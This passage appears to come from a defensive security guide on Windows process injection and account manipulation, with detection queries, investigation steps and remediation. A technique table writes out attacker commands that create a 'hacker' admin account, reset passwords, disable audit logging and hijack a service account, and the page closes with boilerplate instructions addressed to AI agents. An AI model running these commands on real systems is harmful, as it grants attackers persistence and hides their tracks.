๐Ÿ“Œ **3. Disable Suspicious Services** ```powershell Stop-Service -Name "suspiciousService" ``` #### ๐Ÿ“Œ **4. Remove Malicious Threads** * Terminate injected threads manually. #### ๐Ÿ“Œ **5. Enable Advanced Threat Protection (ATP)** * Ensure real-time protection is active. #### ๐Ÿ“Œ **6. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### ๐Ÿ›ก๏ธ **5. Prevention Steps** 1. **Enable Process Auditing:** * Enable **Event ID 4688** and **4697**. 2. **Use Application Control:** * Block suspicious binaries (`rundll32.exe`, `powershell.exe`) from abnormal execution paths. 3. **Enable Windows Defender ATP:** * Ensure advanced threat protection is enabled. 4. **Monitor Memory Allocation:** * Use tools like **Sysmon** to track thread and memory injection. 5. **Disable Unused Tools:** * Restrict access to **rundll32.exe** and **svchost.exe**. 6. **Educate Users:** * Raise awareness about malicious file execution. *** ### ๐Ÿง  **6. Key Takeaways** * **Process Injection is Stealthy:** It allows attackers to hide malicious code in legitimate processes. * **Monitor Process Tree Anomalies:** Look for unusual parent-child relationships. * **Focus on Memory Behavior:** Techniques like **VirtualAlloc** and **WriteProcessMemory** are common. * **Enable Security Auditing:** Log **Event IDs 4688, 4697**, and **4689**. *** ## ๐Ÿšจ **Account Manipulation** *** ### ๐Ÿ” **1. Attack Breakdown** #### ๐Ÿ“ **What is Account Manipulation?** * **Account Manipulation** refers to the **modification of user accounts** in an operating system or directory service, often with malicious intent. * Attackers manipulate accounts to: * **Maintain Persistence:** Create or modify accounts for long-term access. * **Escalate Privileges:** Grant higher privileges to standard accounts. * **Evade Detection:** Disable logging or lock out legitimate administrators. * **Create Backdoors:** Add unauthorized accounts for fallback access. *** #### ๐Ÿ“‘ **Why Attackers Use Account Manipulation?** * **Stealth Persistence:** Stay undetected while maintaining access. * **Privilege Escalation:** Gain admin or system-level access. * **Disable Security Controls:** Turn off auditing or account policies. * **Lateral Movement:** Use compromised accounts to move across systems. *** #### ๐Ÿ“Œ **Common Techniques for Account Manipulation** | **Technique** | **Description** | **Example Command** | | ------------------------------ | --------------------------------- | --------------------------------------------------------------- | | **Create New Account** | Add a new local user. | `net user hacker Pass123! /add` | | **Add Account to Admin Group** | Grant administrative privileges. | `net localgroup Administrators hacker /add` | | **Modify Account Properties** | Enable disabled accounts. | `net user Administrator /active:yes` | | **Change Passwords** | Change account passwords. | `net user Administrator NewPass123!` | | **Disable Security Controls** | Turn off account auditing. | `auditpol /set /category:"Account Management" /success:disable` | | **Modify Service Accounts** | Change account used by a service. | `sc config TrustedInstaller obj= .\hacker` | *** #### ๐Ÿ“Š **Common Tools for Account Manipulation** | **Tool** | **Purpose** | | ----------------------------------------------- | ------------------------------------------- | | **Net User** | Create and modify user accounts. | | **PowerShell** | Script account changes. | | **Mimikatz** | Extract and manipulate account credentials. | | **Windows Management Instrumentation (WMI)** | Modify accounts remotely. | | **Active Directory Users and Computers (ADUC)** | Graphical account management. | *** ### ๐Ÿ›ก๏ธ **2. Detection Techniques** #### ๐Ÿ“Š **Manual Inspection with PowerShell** **๐Ÿ•ต๏ธ List Local User Accounts** ```powershell Get-LocalUser ``` **๐Ÿ•ต๏ธ Check Accounts Added to Admin Groups** ```powershell Get-LocalGroupMember -Group "Administrators" ``` **๐Ÿ•ต๏ธ Review Recently Created Accounts** ```powershell Get-LocalUser | Where-Object { $_.LastLogon -gt (Get-Date).AddDays(-7) } ``` **๐Ÿ•ต๏ธ Check for Modified Account Policies** ```powershell auditpol /get /category:"Account Management" ``` **๐Ÿ•ต๏ธ Inspect Event Logs for Account Creation** ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4720} ``` *** #### ๐Ÿ“Š **Microsoft Defender for Endpoint (MDE) Query (KQL)** **๐Ÿ•ต๏ธ Detect Account Creation Events** ```kusto SecurityEvent | where EventID == 4720 | project Timestamp, AccountName, TargetUserName, DeviceName ``` **๐Ÿ•ต๏ธ Detect Accounts Added to Admin Groups** ```kusto SecurityEvent | where EventID == 4728 | project Timestamp, AccountName, GroupName, DeviceName ``` **๐Ÿ•ต๏ธ Detect Suspicious Account Modifications** ```kusto SecurityEvent | where EventID in (4722, 4724, 4725, 4738) | project Timestamp, AccountName, TargetUserName, DeviceName ``` **๐Ÿ•ต๏ธ Monitor Password Changes** ```kusto SecurityEvent | where EventID == 4724 | project Timestamp, AccountName, TargetUserName, DeviceName ``` **๐Ÿ•ต๏ธ Detect Disabled Security Auditing** ```kusto DeviceProcessEvents | where ProcessCommandLine contains "auditpol" | where ProcessCommandLine contains "/set" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` **๐Ÿ•ต๏ธ Monitor Suspicious PowerShell Commands** ```kusto DeviceProcessEvents | where FileName == "powershell.exe" | where ProcessCommandLine contains "New-LocalUser" or ProcessCommandLine contains "Add-LocalGroupMember" | project Timestamp, DeviceName, ProcessCommandLine, AccountName ``` *** #### ๐Ÿ“Š **Event Viewer Logs** | **Event ID** | **Description** | | ------------ | --------------------------------------------------- | | **4720** | A user account was created. | | **4722** | A user account was enabled. | | **4724** | An attempt was made to reset an account's password. | | **4725** | A user account was disabled. | | **4728** | A user was added to a privileged group. | | **4738** | A user account was changed. | **๐Ÿ“Œ Focus on Event ID 4720 (Account Creation):** * Look for unusual account names and timestamps. **๐Ÿ“Œ Focus on Event ID 4728 (Added to Admin Group):** * Check if accounts were added unexpectedly to `Administrators`. **๐Ÿ“Œ Focus on Event ID 4724 (Password Reset):** * Look for accounts with passwords reset by unusual accounts. *** ### ๐Ÿ•ต๏ธ **3. Investigation Techniques** #### 1๏ธโƒฃ **Identify Suspicious Accounts** * Check recently created accounts: ```powershell Get-LocalUser | Where-Object { $_.LastLogon -gt (Get-Date).AddDays(-7) } ``` *** #### 2๏ธโƒฃ **Inspect Privileged Group Membership** * Review `Administrators` group: ```powershell Get-LocalGroupMember -Group "Administrators" ``` *** #### 3๏ธโƒฃ **Trace Password Changes** * Inspect Event Logs: ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4724} ``` *** #### 4๏ธโƒฃ **Audit Account Policies** * Ensure auditing is enabled: ```powershell auditpol /get /category:"Account Management" ``` *** #### 5๏ธโƒฃ **Review Suspicious Commands** * Check for suspicious command execution: ```powershell Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*net user*" } ``` *** ### ๐Ÿ”ง **4. Remediation Steps** #### ๐Ÿ“Œ **1. Disable Suspicious Accounts** ```powershell Disable-LocalUser -Name "SuspiciousUser" ``` #### ๐Ÿ“Œ **2. Remove Unauthorized Group Membership** ```powershell Remove-LocalGroupMember -Group "Administrators" -Member "SuspiciousUser" ``` #### ๐Ÿ“Œ **3. Reset Compromised Account Passwords** ```powershell net user Administrator NewP@ssw0rd! ``` #### ๐Ÿ“Œ **4. Enable Security Auditing** ```powershell auditpol /set /category:"Account Management" /success:enable /failure:enable ``` #### ๐Ÿ“Œ **5. Perform Full Antivirus Scan** ```powershell Start-MpScan -ScanType FullScan ``` *** ### ๐Ÿ›ก๏ธ **5. Prevention Steps** 1. **Enable Account Auditing:** * Ensure **Event IDs 4720, 4728, 4724, and 4738** are logged. 2. **Use Least Privilege Principle:** * Limit admin access to essential accounts only. 3. **Implement Strong Password Policies:** * Enforce **complex passwords** and regular password changes. 4. **Restrict Account Creation:** * Use **Group Policy** to restrict account creation permissions. 5. **Enable Multi-Factor Authentication (MFA):** * Prevent unauthorized account access. 6. **Monitor Critical Accounts:** * Set up alerts for admin accounts and privileged group changes. 7. **Educate Administrators:** * Train admins to recognize and respond to account manipulation attempts. *** ### ๐Ÿง  **6. Key Takeaways** * **Account Manipulation Enables Persistence:** Attackers use it for long-term access. * **Monitor Privileged Groups:** Admin group changes are a red flag. * **Audit Account Changes:** Focus on **Event IDs 4720, 4728, 4724**. * **Prevent Unauthorized Account Modifications:** Use **Group Policy** and **MFA**. *** --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xmedhat.gitbook.io/whoami/attacks-and-detections/part-3.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.